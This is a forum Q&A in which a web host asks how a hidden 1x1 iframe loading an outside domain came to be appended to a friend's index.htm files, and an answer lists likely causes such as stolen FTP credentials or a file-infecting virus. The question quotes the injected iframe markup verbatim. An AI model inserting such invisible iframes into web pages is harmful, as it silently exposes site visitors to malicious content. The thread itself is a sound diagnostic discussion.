0

On two websites which I host for a friend, I found that there is an iframe at the bottom of each site's index.htm file.

<iframe src="http://www.kunstsalen.dk" width=1 height=1
style="visibility: hidden; position: absolute;"></iframe>

This isn't something that should be on his home pages. It is causing a security warning to show up in browsers which says that his website is a virus/infected site. How did this get there? He has FTP access and both files changed on 11/5/2011 at about the same time. Could he have a virus which changed his local index.htm files and he uploaded them unknowingly? Could a virus use his saved FTP information to log in and change the files without him knowing?

The reason I am assume it originated from his machine is because I have over 500 other index.htm files on my server and none of them were affected. Only the two index.htm files which are accessible through his FTP account.

Rush Frisby
  • 350
  • 1
  • 2
  • 11

1 Answers1

2

There can be several scenarios (hard to tell without knowing more).

  1. Your friends FTP credentials were stolen and someone logged in and uploaded modified versions of these files. This can be a keylogger on one his computers (as an example)

  2. Your friends' other credentials were stolen (e-mail?) and were used to gain access to the web site. This can be access to the management console and/of SSH.

  3. Your friends' provider was hacked and there were several customers affected

  4. You friend has a virus on his computer that modifies specific files (e.g. *.php) by appending this iframe.

etc

DmitryK
  • 214
  • 2
  • 3